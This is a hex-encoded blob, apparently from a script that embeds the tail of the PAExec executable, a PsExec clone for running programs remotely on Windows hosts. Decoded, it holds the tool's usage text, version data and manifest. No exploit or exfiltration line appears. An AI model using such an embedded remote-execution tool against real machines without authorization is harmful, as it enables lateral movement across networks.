'0000000000000000000000946842000000000000000000000000009468420' \
'0000000000000000000000000946842000000000000000000010000000100' \
'0000000000000000000000000000f86d4200000000000000000020d04100a' \
'8d4410028d641009868420000000000000000000000000000000000000000' \
'0000000000006a42007066420001000000feffffff0100000000000000010' \
'0000016000000020000000200000003000000020000000400000018000000' \
'050000000d0000000600000009000000070000000c000000080000000c000' \
'000090000000c0000000a000000070000000b000000080000000c00000016' \
'0000000d000000160000000f00000002000000100000000d0000001100000' \
'0120000001200000002000000210000000d00000035000000020000004100' \
'00000d00000043000000020000005000000011000000520000000d0000005' \
'30000000d0000005700000016000000590000000b0000006c0000000d0000' \
'006d00000020000000700000001c000000720000000900000006000000160' \
'00000800000000a000000810000000a000000820000000900000083000000' \
'16000000840000000d00000091000000290000009e0000000d000000a1000' \
'00002000000a40000000b000000a70000000d000000b700000011000000ce' \
'00000002000000d70000000b000000180700000c0000000c0000000800000' \
'024d24100ffffffff2cbc410058224200ffffffff800a0000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000001000000000000' \
'0001000000000000000000000000000000010000000000000001000000000' \
'0000000000000000000000100000000000000010000000000000001000000' \
'0000000000000000000000000100000000000000000000000000000001000' \
'0000000000001000000000000000100000000000000000000000000000001' \
'0000000000000001000000000000000100000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'00000feffffff000000000000000000000000020000000000000000000000' \
'0000000094b14100000000002e3f41566261645f657863657074696f6e407' \
'37464404000f86d42002e000000f46d4200f07f4200f07f4200f07f4200f0' \
'7f4200f07f4200f07f4200f07f4200f07f4200f07f42007f7f7f7f7f7f7f7' \
'f486e4200f47f4200f47f4200f47f4200f47f4200f47f4200f47f4200f47f' \
'42002e00000020d0410022d24100000000000000000000000000668741006' \
'6874100668741006687410066874100668741006687410066874100668741' \
'0066874100000000000000000020059319000000000000000000000000fef' \
'fffff94b14100000000002e3f415643436d644c696e655061727365724040' \
'0000000094b14100000000002e3f41564341746c457863657074696f6e404' \
'1544c40400094b14100000000002e3f415652656d4d736740400000000000' \
'0000001c02420001010000200242000100000024024200010100002c02420' \
'000000000340242000101000038024200000000003c024200000000004002' \
'420000000000440242000000000048024200000000004c024200010000005' \
'0024200000000005402420000000000640242000000000068024200000000' \
'006c02420001010000700242000000000074024200000000007c024200000' \
'000009402420000000000ac02420000000000b802420000000000cc024200' \
'00000000e402420001010000e802420001010000f40242000101000000034' \
'20000000000fcfc4100010100000803420001010000f4fc41000000000010' \
'034200010100001803420000000000280342000000000094b141000000000' \
'02e3f41565f496f73747265616d5f6572726f725f63617465676f72794073' \
'74644040000094b14100000000002e3f41565f53797374656d5f6572726f7' \
'25f63617465676f72794073746440400000000094b14100000000002e3f41' \
'566572726f725f63617465676f72794073746440400000000094b14100000' \
'000002e3f41565f47656e657269635f6572726f725f63617465676f727940' \
'73746440400000001ca44100e4a3410000a44100000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000001000300300100803000' \
'0080060000004800008010000000600000801800000078000080000000000' \
'0000000000000000000010065000000900000800000000000000000000000' \
'000000010007000000a800008000000000000000000000000000000100010' \
'00000c00000800000000000000000000000000000010001000000d8000080' \
'0000000000000000000000000000010009040000f00000000000000000000' \
'0000000000000000100090400000001000000000000000000000000000000' \
'0001000904000010010000000000000000000000000000000001000904000' \
'02001000048a40200c11e0000000000000000000010c302002c0000000000' \
'00000000000040a1020004030000000000000000000040c302007d0100000' \
'0000000000000000400540045005800540000000000000004033400000056' \
'0053005f00560045005200530049004f004e005f0049004e0046004f00000' \
'00000bd04effe000001001a000100000000001a0001000000000017000000' \
'0000000004000000010000000000000000000000000000006202000001005' \
'3007400720069006e006700460069006c00650049006e0066006f0000003e' \
'0200000100300034003000390030003400620030000000400010000100430' \
'06f006d00700061006e0079004e0061006d0065000000000050006f007700' \
'650072002000410064006d0069006e0020004c004c00430000004e0013000' \
'100460069006c0065004400650073006300720069007000740069006f006e' \
'000000000050004100450078006500630020004100700070006c006900630' \
'06100740069006f006e0000000000320009000100460069006c0065005600' \
'65007200730069006f006e000000000031002e00320036002e0030002e003' \
'000000000002e000700010049006e007400650072006e0061006c004e0061' \
'006d0065000000500041004500780065006300000000007400280001004c0' \
'06500670061006c0043006f00700079007200690067006800740000004300' \
'6f00700079007200690067006800740020002800630029002000320030003' \
'10032002d003200300031003500200050006f007700650072002000410064' \
'006d0069006e0020004c004c00430000003e000b0001004f0072006900670' \
'069006e0061006c00460069006c0065006e0061006d006500000050004100' \
'45007800650063002e0065007800650000000000460013000100500072006' \
'f0064007500630074004e0061006d00650000000000500041004500780065' \
'00630020004100700070006c00690063006100740069006f006e000000000' \
'0360009000100500072006f00640075006300740056006500720073006900' \
'6f006e00000031002e00320036002e0030002e00300000000000440000000' \
'100560061007200460069006c00650049006e0066006f0000000000240004' \
'0000005400720061006e0073006c006100740069006f006e0000000000090' \
'4b00400000000504145786563206973206120667265656c792d7265646973' \
'74726962757461626c652072652d696d706c656d656e746174696f6e206f6' \
'6200d0a537973496e7465726e616c2f4d6963726f736f6674277320706f70' \
'756c6172205073457865632070726f6772616d2e202050414578656320616' \
'96d7320746f20626520612064726f70200d0a696e207265706c6163656d65' \
'6e7420666f72205073457865632c20736f2074686520636f6d6d616e642d6' \
'c696e65207573616765206973206964656e746963616c2c2077697468200d' \
'0a6164646974696f6e616c206f7074696f6e7320616c736f20737570706f7' \
'27465642e20205468697320776f726b20776173206f726967696e616c6c79' \
'20696e737069726564206279200d0a54616c6861205461726971277320526' \
'<KEY>' \
'<KEY>' \
'd0d0a5b2d752075736572205b2d702070737377645d7c5b2d70402066696c' \
'65205b2d7040645d5d5d200d0a5b2d6e20735d205b2d6c5d5b2d737c2d655' \
'd5b2d785d5b2d69205b73657373696f6e5d5d5b2d63205b2d667c2d765d20' \
'<KEY>' \
'<KEY>' \
'2d3c7072696f726974793e5d5b2d61206e2c6e2c2e2e2e5d0d0a5b2d64667' \
'25d5b2d6e6f6e616d655d5b2d746f207365636f6e64735d20636d64205b61' \
'7267756d656e74735d0d0a0d0a5374616e64617264205041457865635c507' \
'34578656320636f6d6d616e64206c696e65206f7074696f6e733a0d0a0d0a' \
'20202020202d6120202020202020202053657061726174652070726f63657' \
'3736f7273206f6e20776869636820746865206170706c69636174696f6e20' \
'63616e2072756e20776974680d0a202020202020202020202020202020206' \
'36f6d6d6173207768657265203120697320746865206c6f77657374206e75' \
'6d6265726564204350552e20466f72206578616d706c652c0d0a202020202' \
'02020202020202020202020746f2072756e20746865206170706c69636174' \
'696f6e206f6e20435055203220616e642043505520342c20656e7465723a0' \
'd0a202020202020202020202020202020202d6120322c340d0a2020202020' \
'20202020202020202020200d0a20202020202d63202020202020202020436' \
'f707920746865207370656369666965642070726f6772616d20746f207468' \
'652072656d6f74652073797374656d20666f720d0a2020202020202020202' \
'0202020202020657865637574696f6e2e20496620796f75206f6d69742074' \
'686973206f7074696f6e20746865206170706c69636174696f6e0d0a20202' \
'0202020202020202020202020206d75737420626520696e20746865207379' \
'7374656d2070617468206f6e207468652072656d6f74652073797374656d2' \
'e0d0a0d0a20202020202d64202020202020202020446f6e27742077616974' \
'20666f722070726f6365737320746f207465726d696e61746520286e6f6e2' \
'd696e746572616374697665292e0d0a202020202020202020202020202020' \
'2054686973206f7074696f6e206973206e6f7420636f6d70617469626c652' \
'077697468202d746f0d0a0d0a20202020202d65202020202020202020446f' \
'6573206e6f74206c6f61642074686520737065636966696564206163636f7' \
'56e7427732070726f66696c652e0d0a0d0a20202020202d66202020202020' \
'202020436f707920746865207370656369666965642070726f6772616d206' \
'576656e206966207468652066696c6520616c72656164790d0a2020202020' \
'2020202020202020202020657869737473206f6e207468652072656d6f746' \
'52073797374656d2e20205265717569726573202d630d0a0d0a2020202020' \
'2d6920202020202020202052756e207468652070726f6772616d20736f207' \
'468617420697420696e74657261637473207769746820746865206465736b' \
'746f70206f66207468650d0a2020202020202020202020202020202073706' \
'56369666965642073657373696f6e206f6e20746865207370656369666965' \
'642073797374656d2e204966206e6f2073657373696f6e2069730d0a20202' \
'020202020202020202020202020737065636966696564207468652070726f' \
'636573732072756e7320696e2074686520636f6e736f6c652073657373696' \
'f6e2e200d0a0d0a20202020202d6820202020202020202049662074686520' \
'7461726765742073797374656d206973205669737461206f7220686967686' \
'5722c20686173207468652070726f63657373200d0a202020202020202020' \
'2020202020202072756e207769746820746865206163636f756e742773206' \
'56c65766174656420746f6b656e2c20696620617661696c61626c652e200d' \
'0a0d0a20202020202d6c2020202020202020205b4558504552494d454e544' \
'14c5d2052756e2070726f63657373206173206c696d697465642075736572' \
'202873747269707320746865200d0a2020202020202020202020202020202' \
'041646d696e6973747261746f72732067726f757020616e6420616c6c6f77' \
'73206f6e6c792070726976696c656765732061737369676e656420746f0d0' \
'a202020202020202020202020202020207468652055736572732067726f75' \
'70292e204f6e2057696e646f7773205669737461207468652070726f63657' \
'3732072756e732077697468204c6f77200d0a202020202020202020202020' \
'20202020496e746567726974792e0d0a0d0a20202020202d6e20202020202' \
'02020205370656369666965732074696d656f757420696e207365636f6e64' \
'7320636f6e6e656374696e6720746f2072656d6f746520636f6d707574657' \
'2732e0d0a0d0a20202020202d702020202020202020205370656369666965' \
'73206f7074696f6e616c2070617373776f726420666f722075736572206e6' \
'16d652e20496620796f75206f6d697420746869730d0a2020202020202020' \
'2020202020202020796f752077696c6c2062652070726f6d7074656420746' \
'f20656e74657220612068696464656e2070617373776f72642e2020416c73' \
'6f207365650d0a202020202020202020202020202020202d704020616e642' \
'02d7040642062656c6f772e0d0a20202020200d0a20202020202d73202020' \
'20202020202052756e207468652070726f6365737320696e2074686520537' \
'97374656d206163636f756e742e0d0a0d0a20202020202d75202020202020' \
'202020537065636966696573206f7074696f6e616c2075736572206e616d6' \
'520666f72206c6f67696e20746f2072656d6f74650d0a2020202020202020' \
'2020202020202020636f6d70757465722e0d0a0d0a20202020202d7620202' \
'0202020202020436f707920746865207370656369666965642066696c6520' \
'6f6e6c79206966206974206861732061206869676865722076657273696f6' \
'e206e756d6265720d0a202020202020202020202020202020206f72206973' \
'206e65776572207468616e20746865206f6e65206f6e207468652072656d6' \
'f74652073797374656d2e20205265717569726573202d630d0a0d0a202020' \
'20202d772020202020202020205365742074686520776f726b696e6720646' \
'9726563746f7279206f66207468652070726f63657373202872656c617469' \
'766520746f0d0a2020202020202020202020202020202072656d6f7465206' \
'36f6d7075746572292e0d0a0d0a20202020202d7820202020202020202044' \
'6973706c617920746865205549206f6e207468652057696e6c6f676f6e207' \
'36563757265206465736b746f7020284c6f63616c2053797374656d200d0a' \
'202020202020202020202020202020206f6e6c79292e20200d0a0d0a20202' \
'020202d3c7072696f726974793e2053706563696679202d6c6f772c202d62' \
'656c6f776e6f726d616c2c202d61626f76656e6f726d616c2c202d6869676' \
'8206f720d0a202020202020202020202020202020202d7265616c74696d65' \
'20746f2072756e207468652070726f6365737320617420612064696666657' \
'2656e74207072696f726974792e205573650d0a2020202020202020202020' \
'20202020202d6261636b67726f756e6420746f2072756e206174206c6f772' \
'06d656d6f727920616e6420492f4f207072696f72697479206f6e20566973' \
'74612e0d0a0d0a2020202020636f6d7075746572202020446972656374205' \
'0414578656320746f2072756e20746865206170706c69636174696f6e206f' \
'6e207468652072656d6f74650d0a202020202020202020202020202020206' \
'36f6d7075746572206f7220636f6d70757465727320737065636966696564' \
'2e20496620796f75206f6d69742074686520636f6d70757465720d0a20202' \
'0202020202020202020202020206e616d65205041457865632072756e7320' \
'746865206170706c69636174696f6e206f6e20746865206c6f63616c20737' \
'97374656d2c0d0a20202020202020202020202020202020616e6420696620' \
'796f75207370656369667920612077696c646361726420285c5c2a292c205' \
'041457865632072756e73207468650d0a2020202020202020202020202020' \
'2020636f6d6d616e64206f6e20616c6c20636f6d70757465727320696e207' \
'468652063757272656e7420646f6d61696e2e0d0a0d0a2020202020406669' \
'6c652020202020205041457865632077696c6c20657865637574652074686' \
'520636f6d6d616e64206f6e2065616368206f662074686520636f6d707574' \
'657273200d0a202020202020202020202020202020206c697374656420696' \
'e207468652066696c652e0d0a0d0a202020202070726f6772616d20202020' \
'4e616d65206f66206170706c69636174696f6e20746f20657865637574652' \
'e0d0a0d0a2020202020617267756d656e74732020417267756d656e747320' \
'746f207061737320286e6f746520746861742066696c65207061746873206' \
'd757374206265206162736f6c757465200d0a202020202020202020202020' \
'202020207061746873206f6e20746865207461726765742073797374656d2' \
'92e0d0a0d0a4164646974696f6e616c206f7074696f6e73206f6e6c792061' \
'7661696c61626c6520696e205041457865633a0d0a202020200d0a2020202' \
'0202d636e6f64656c202020496620612066696c6520697320636f70696564' \
'20746f20746865207365727665722077697468202d632c206974206973206' \
'e6f726d616c6c79200d0a20202020202020202020202020202064656c6574' \
'65642028756e6c657373202d6420697320737065636966696564292e20202' \
'd636e6f64656c20696e64696361746573207468652066696c65200d0a2020' \
'2020202020202020202020202073686f756c64206e6f742062652064656c6' \
'57465642e0d0a2020202020202020202020202020200d0a20202020202d63' \
'6c697374202020205768656e207573696e67202d632028636f7079292c202' \
'd636c69737420616c6c6f777320796f7520746f2073706563696679206120' \
'74657874200d0a20202020202020202020202020202066696c65207468617' \
'420636f6e7461696e732061206c697374206f662066696c657320746f2063' \
'6f707920746f20746865207461726765742e20200d0a20202020202020202' \
'020202020202054686520746578742066696c652073686f756c64206a7573' \
'74206c6973742066696c65206e616d65732c20616e64207468652066696c6' \
'573200d0a20202020202020202020202020202073686f756c642062652069' \
'6e207468652073616d6520666f6c646572206173207468652074657874206' \
'6696c652e0d0a2020202020202020202020202020204578616d706c653a20' \
'2d63202d636c6973742022433a5c7465737420706174685c66696c656c697' \
'3742e747874220d0a2020202020202020202020202020200d0a2020202020' \
'2020202020202020202066696c656c6973742e747874206d6967687420636' \
'f6e7461696e3a0d0a2020202020202020202020202020206d796170702e65' \
'78650d0a2020202020202020202020202020206d79646174612e6461740d0' \
'a2020202020202020202020202020200d0a20202020202020202020202020' \
'20204d796170702e65786520616e64206d79646174612e64617420776f756' \
'c64206e65656420746f20626520696e20433a5c746573742070617468200d' \
'0a202020202020202020202020202020696e20746865206578616d706c652' \
'061626f76652e20200d0a2020202020202020202020202020200d0a202020' \
'202020202020202020202020494d504f5254414e543a20546865206669727' \
'3742066696c65206c697374656420697320617373756d656420746f206265' \
'20746865206f6e652074686174200d0a20202020202020202020202020202' \
'077696c6c2062652065786563757465642e0d0a2020202020202020202020' \
'202020200d0a2020202020202020202020202020202d636c69737420616e6' \
'4202d637372632063616e6e6f74206265207573656420746f676574686572' \
'2e0d0a0d0a20202020202d6373726320202020205768656e207573696e672' \
'02d632028636f7079292c202d6373726320616c6c6f777320796f7520746f' \
'207370656369667920616e200d0a202020202020202020202020202020616' \
'c7465726e617465207061746820746f20636f7079207468652070726f6772' \
'616d2066726f6d2e20200d0a2020202020202020202020202020204578616' \
'd706c653a202d63202d637372632022433a5c7465737420706174685c6669' \
'6c652e657865220d0a2020202020202020202020202020200d0a202020202' \
'02d6462672020202020204f757470757420746f2044656275675669657720' \
'6170706c69636174696f6e20284f75747075744465627567537472696e672' \
'90d0a0d0a20202020202d64667220202020202044697361626c6520574f57' \
'36342046696c65205265646972656374696f6e20666f7220746865206e657' \
'72070726f636573730d0a0d0a20202020202d6c6f202020202020204c6f67' \
'204f757470757420746f2066696c652e202045783a202d6c6f20433a5c546' \
'56d705c5041457865632e6c6f670d0a202020202020202020202020202020' \
'5468652066696c652077696c6c206265205554462d3820776974682061204' \
'2797465204f72646572204d61726b206174207468652073746172742e2020' \
'0d0a0d0a20202020202d7040202020202020202057696c6c2072656164207' \
'46865206669727374206c696e65206f662074686520676976656e2066696c' \
'6520616e6420757365207468617420617320746865200d0a2020202020202' \
'020202020202020202070617373776f72642e202046696c652073686f756c' \
'64206265207361766564206173205554462d382077697468206f722077697' \
'4686f75740d0a2020202020202020202020202020202042797465204f7264' \
'6572204d61726b2e0d0a20202020202020202020200d0a20202020202d704' \
'0642020202020202044656c65746573207468652066696c65207370656369' \
'66696564206279202d704020617320736f6f6e20617320746865207061737' \
'3776f7264206973200d0a2020202020202020202020202020202072656164' \
'2e20202020200d0a0d0a20202020202d726c6f20202020202052656d6f746' \
'5204c6f67204f75747075743a204c6f672066726f6d2072656d6f74652073' \
'65727669636520746f2066696c6520286f6e2072656d6f7465200d0a20202' \
'0202020202020202020202020736572766572292e20200d0a202020202020' \
'20202020202020202045783a202d726c6f20433a5c54656d705c504145786' \
'5632e6c6f670d0a2020202020202020202020202020205468652066696c65' \
'2077696c6c206265205554462d38207769746820612042797465204f72646' \
'572204d61726b206174207468652073746172742e20200d0a202020202020' \
'2020202020202020200d0a20202020202d746f2020202020202054696d656' \
'f757420696e207365636f6e64732e2020546865206c61756e636865642070' \
'726f63657373206d75737420657869742077697468696e2074686973200d0' \
'a2020202020202020202020202020206e756d626572206f66207365636f6e' \
'6473206f722069742077696c6c206265207465726d696e617465642e20204' \
'966206974206973207465726d696e617465642c200d0a2020202020202020' \
'20202020202020746865206578697420636f64652077696c6c206265202d3' \
'1300d0a20202020202020202020202020202054686973206f7074696f6e20' \
'6973206e6f7420636f6d70617469626c652077697468202d640d0a2020202' \
'0202020202020202020202045783a202d746f203135202020200d0a202020' \
'2020202020202020202020205465726d696e61746520746865206c61756e6' \
'36865642070726f63657373206166746572203135207365636f6e64732069' \
'6620697420646f65736e2774207368757420646f776e2066697273740d0a2' \
'020202020202020202020202020200d0a20202020202d6e6f6e616d652020' \
'20496e206f7264657220746f20726f627573746c792068616e646c65206d7' \
'56c7469706c652073696d756c74616e656f757320636f6e6e656374696f6e' \
'7320746f2061207365727665722c0d0a20202020202020202020202020202' \
'074686520736f75726365207365727665722773206e616d65206973206164' \
'64656420746f207468652072656d6f74652073657276696365206e616d652' \
'0616e642072656d6f7465205041457865630d0a2020202020202020202020' \
'2020202065786563757461626c652066696c652e2020496620796f7520646' \
'f204e4f542077616e742074686973206265686176696f722c20757365202d' \
'6e6f6e616d650d0a2020202020202020202020202020200d0a0d0a5468652' \
'06170706c69636174696f6e206e616d652c20636f707920736f757263652c' \
'20776f726b696e67206469726563746f727920616e64206c6f672066696c6' \
'50d0a656e74726965732063616e2062652071756f74656420696620746865' \
'207061746820636f6e7461696e7320612073706163652e2020466f7220657' \
'8616d706c653a0d0a504145786563205c5c746573742d736572766572202d' \
'772022433a5c706174682077697468207370616365222022433a5c70726f6' \
'772616d2066696c65735c6170702e657865220d0a0d0a4c696b6520507345' \
'7865632c20696e7075742069732073656e7420746f207468652072656d6f7' \
'4652073797374656d207768656e20456e7465722069732070726573736564' \
'2c0d0a616e64204374726c2d432073746f7073207468652072656d6f74652' \
'070726f6365737320616e642073746f7073205041457865632e0d0a0d0a50' \
'73457865632070617373657320616c6c20706172616d657465727320696e2' \
'0636c6561722d746578742e2020496e20636f6e74726173742c2050414578' \
'65632077696c6c20736372616d626c650d0a74686520706172616d6574657' \
'27320746f2070726f74656374207468656d2066726f6d2063617375616c20' \
'7769726520736e6966666572732c20627574207468657920617265204e4f5' \
'4200d0a656e637279707465642e20204e6f74652074686174206461746120' \
'706173736564206265747765656e2050414578656320616e6420746865207' \
'2656d6f74652070726f6772616d206973204e4f54200d0a736372616d626c' \
'6564206f7220656e63727970746564202d2d207468652073616d652061732' \
'077697468205073457865632e0d0a0d0a5041457865632077696c6c207265' \
'7475726e20746865206572726f7220636f646520697420726563656976657' \
'32066726f6d20746865206170706c69636174696f6e207468617420776173' \
'200d0a6c61756e636865642072656d6f74656c792e2020496620504145786' \
'56320697473656c662068617320616e206572726f722c2074686520726574' \
'75726e20636f64652077696c6c206265200d0a6f6e65206f663a0d0a0d0a2' \
'020202d31203d20696e7465726e616c206572726f720d0a2020202d32203d' \
'20636f6d6d616e64206c696e65206572726f720d0a2020202d33203d20666' \
'1696c656420746f206c61756e63682061707020286c6f63616c6c79290d0a' \
'2020202d34203d206661696c656420746f20636f707920504145786563207' \
'46f2072656d6f74652028636f6e6e656374696f6e20746f2041444d494e24' \
'206d696768742068617665200d0a20202020202020206661696c6564290d0' \
'a2020202d35203d20636f6e6e656374696f6e20746f207365727665722074' \
'616b696e6720746f6f206c6f6e67202874696d656f7574290d0a2020202d3' \
'6203d20504145786563207365727669636520636f756c64206e6f74206265' \
'20696e7374616c6c65642f73746172746564206f6e2072656d6f746520736' \
'5727665720d0a2020202d37203d20636f756c64206e6f7420636f6d6d756e' \
'696361746520776974682072656d6f7465205041457865632073657276696' \
'3652020200d0a2020202d38203d206661696c656420746f20636f70792061' \
'707020746f2072656d6f7465207365727665720d0a2020202d39203d20666' \
'1696c656420746f206c61756e636820617070202872656d6f74656c79290d' \
'0a20202d3130203d2061707020776173207465726d696e617465642061667' \
'465722074696d656f757420657870697265640d0a20202d3131203d20666f' \
'726369626c792073746f707065642077697468204374726c2d43202f20437' \
'4726c2d427265616b0d0a0000000000000000000000000000000000000000' \
'0006005000410045007800650063000000000000000000000000000000000' \
'0000000003c3f786d6c2076657273696f6e3d27312e302720656e636f6469' \
'6e673d275554462d3827207374616e64616c6f6e653d27796573273f3e0d0' \
'a3c617373656d626c7920786d6c6e733d2775726e3a736368656d61732d6d' \
'6963726f736f66742d636f6d3a61736d2e763127206d616e6966657374566' \
'57273696f6e3d27312e30273e0d0a20203c7472757374496e666f20786d6c' \
'6e733d2275726e3a736368656d61732d6d6963726f736f66742d636f6d3a6' \
'1736d2e7633223e0d0a202020203c73656375726974793e0d0a2020202020' \
'203c72657175657374656450726976696c656765733e0d0a2020202020202' \
'0203c726571756573746564457865637574696f6e4c6576656c206c657665' \
'6c3d276173496e766f6b6572272075694163636573733d2766616c7365272' \
'02f3e0d0a2020202020203c2f72657175657374656450726976696c656765' \
'733e0d0a202020203c2f73656375726974793e0d0a20203c2f74727573744' \
'96e666f3e0d0a3c2f617373656d626c793e0d0a0000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'00000000000000001000004c000000033015301b308030a830d83004313a3' \
'18e31b03138325e32a1324e34033512359c359036b636d1365d37b438e43a' \
'f13ae03bec3bfa3b233f793f933fa33fb33fdc3f000000200000d40000000' \
'7302a3047307930c130dd300e314f315b317531cd31ed31fa311632503262' \
'3296329c32ed32003311333a3366337f33e733f733223431343b348234ae3' \
'4bb34d434eb34f1343c354f3560358b35b035d535e435ee35133625363636' \
'513683369836a136b936d036e03606371037213739378837c037ca37ed37f' \
'f3705381c38263831383b386a388c389e38b838df38fa3843396239733990' \
'39af39d739f6393e3a443aa03aae3ac23ad13ae23aef3afe3a0f3b1c3b2b3' \
'b3c3b473b553b6a3b7b3b8c3ba83b443d1f3fa13f00300000d00000003530' \
'6930e5300c32de320b331b332e3359338133be33c933e233ec33f33320344' \
'4344d3456345c3465346c34713478348334a134b634d434de34f73408353e' \
'356c357235b935d235fa353236b836c936d036de36f23604371d3762376d3' \
'7c037dc37f3377d3828395a39ae390b3a293a3a3a513a6a3a883aa63ac43a' \
'033b363b543b623b743b683c723c953cb13ccf3ce63ced3c0c3d4f3d893d9' \
'43d9e3da83dbd3dca3df43d123e183e4c3e5f3e873e9f3eac3ec83ed93ee6' \
'3e0a3f353f433f503f7f3fb63fea3f004000003c0000005a30b6300931bd3' \
'128326e32ca322d34323488349534d7350b361d377f37ad3712382e393b39' \
'4a39a739303ab03efc3e133fa03f00500000ac0000008430f7300c3142317' \
'b31c931db318332a932ea321a334933b733fa3326346e34e2341b3553359f' \
'<KEY>' \
'864399939ce39fc39033a143a433a4a3a923abc3ae83a163b373b583b8b3b' \
'963bc03be93b0b3c403c4e3c5e3c723c933ce73cfc3c013d0c3d193d443d6' \
'23d8b3db03dd23ddc3d073e153e423e6a3e963ec23eee3e1a3f433f6f3f9f' \
'3fd13f00600000b00000008830bb30cb30d53001313831ab313a327632a53' \
'2d032de32033325332f335b338d33a3343b354e376c387b3885389a38bb38' \
'f438193942397a399a39bd39cd39e339f439123a993acf3a043b103b213b4' \
'03b4c3b5c3b713bbe3bc63bd13bdf3bea3bf03b0e3c143c273c2f3c3f3c46' \
'3c4e3c583c5f3c7e3c8a3c9b3ca63cc43c863da13df73d083e183e3b3e873' \
'ecc3e073f133f243f2e3f353f413f4d3f833f8c3fad3fe73f000000700000' \
'f40000007030a730e530f130fd300e3118311f315731603175318531b131b' \
'd31c9310732373240325c3269326e327e328e32cb32d53207333e334b3354' \
'335d336a339f33a933c533df33fa330e3449346234ca34de34fb3436354d3' \
'59e35a735de35073624363e366f368a3696369e36a536bc36e736f9360237' \
'0b3711371d3722372a37303737373d3744374b3751375f37a237a937c937d' \
'337da37e837f337063825383e384c3853388438a938c738d438e338f538fc' \
'<KEY>' \
'dbb3ddd3d0a3e393e593e853eb33ef93e0e3f533f8f3fdd3ff13f00800000' \
'e8000000013085308d30a130bc30fc30233140317e318331cc31df312c324' \
'23250325d32763280329532e9320533143360336d337933d833e733283432' \
'34503469349c34d734e134e834153535353e3548354f355b3562356935773' \
'5a635b535f835033609362e364736523658369236c936f03600373d376a37' \
'7337a737b937c337d437e037ee371d382f383438423882389038c138f0390' \
'63a883ad73ae83a1c3b5b3b653b783ba73bbc3b1a3c243c3a3c643c6c3c7b' \
'3ca03cfa3c043d1d3d3e3d4d3d723df23dff3d123e473e5c3e6f3edf3ef03' \
'e303f633f7a3f9e3fae3ff43f000000900000c8000000023013305d308330' \
'ad30d4300f3118312b313a3144317a31c131d6311b322e3265326f3282328' \
'd32a03231333d337c3393339f33a533ab33b433bb33c23304340a34333497' \
'34a734fa342735d135e235e935f835083618362c3676368e36dc36f836143' \
'73037aa37b637363857388f38d138ef381539683977398b3990399739b139' \
'ed39203b2b3b353b3c3b503b553b5b3bbd3cc93cce3c0c3d253d3e3d523d6' \
'13d663d903dad3dd33d283e553e873eea3eef3efc3e043f0b3f143f1a3fcc' \
'3f00a000001801000011307a31b831cb31d731ee316a32d832e632f432013' \
'3173323332f33363349335a3309342a343734463476358035da35ef351936' \
'1f362d3633363d3647364d3657365e3668366e36873690369736a136ab36b' \
'136b736c136ca36d836f23609371a3733378d3727384f3858386138893890' \
'389738d338e538f6380d3913391f39263930393a3945394a39503955395f3' \
'9663975397c39863990399739a339b539cf39e839043a173a4c3a643a773a' \
'ae3ab83acb3ad93af03af73a0a3b213b393b4c3b5b3b633b6e3b763b7c3b8' \
'23b8c3bcc3bd93bf63b013c0b3c153c323c3c3c423c4c3c693c703c803cd7' \
'3c113d1e3d253d2c3da43db63d383e513e693e803e9e3eb73ee83ef13e073' \
'f203f2c3fe83f00b00000fc000000123039306f309430a330d830f4300f31' \
'673182319231bb31c131d131d631f33117322f32363241326a32a832bb32c' \
'932d032d932f6320c333f334e335b336c33a333c233c933d6330d341e3427' \
'346f3479348634b734c93475367e3684368c3695369f36a736ae36b336b93' \
'6be36c436c936ce36d736e436ec36f33601370e3717371d3725372e373637' \
'3e3747374e37533759375e376437693773378037e73721384c38543872389' \
'<KEY>' \
'3c743d853da23db13de63d183e2a3e563e763eba3ed53ef03e0b3f183f2e3' \
'f7c3f863f913fb43fbf3fe23fed3f00c00000f400000005300b302f303530' \
'5b306b301f3126313b3145310a3268331b36253630363f364636593691369' \
'7369d36a336a936af36b636bd36c436cb36d236d936e036e836f036f83604' \
'370d371237183722372c373c374c375c37653796379c37a237a837ae37b43' \
'7bb37c237c937d037d737de37e537ed37f537fd3708380d3813381d382738' \
'3a383f384d38c138c838ea38f1385d397739863993399f39af39be39c539d' \
'639e439ef39f739043a0e3a343a653a723a7b3a9f3acc3a883bdd3b033c0e' \
'3c303c833cde3cfa3c063d123d193d2b3d393d473d503d6e3db43dc23dd73' \
'de63dfa3d703e763e133f3b3f493f00d00000cc000000f53013312c313331' \
'3b3140314431483171319731b531bc31c031c431c831cc31d031d431d8312' \
'23228322c32303234329a32a532c032c732cc32d032d432f5321f33513358' \
'335c336033643368336c3370337433be33c433c833cc33d0339835a435ae3' \
'5d03537363e364636523658365f366b367036763682368836c136c836ce36' \
'13371b3727372d3734373f3744374a3754375a37723777377c379337d837d' \
'f37e73757385c38653871387638a638f138fc380739cd390b3a153a6a3a2d' \
'3bee3d000000e00000d00000005530033171327f328532b632c132ca32013' \
'30833363345334d335a33d533e533f433173427347c348b34bb34c234f334' \
'e6350f36ab3705380b3844385d3868386e3880388a389338db38e038ea382' \
'4392939303936399a39d639dc39ee39143a373ab33adb3ae93a953cb33ccc' \
'3cd33cdb3ce03ce43ce83c113d373d553d5c3d603d643d683d6c3d703d743' \
'd783dc23dc83dcc3dd03dd43d3a3e453e603e673e6c3e703e743e953ebf3e' \
'f13ef83efc3e003f043f083f0c3f103f143f5e3f643f683f6c3f703f00000' \
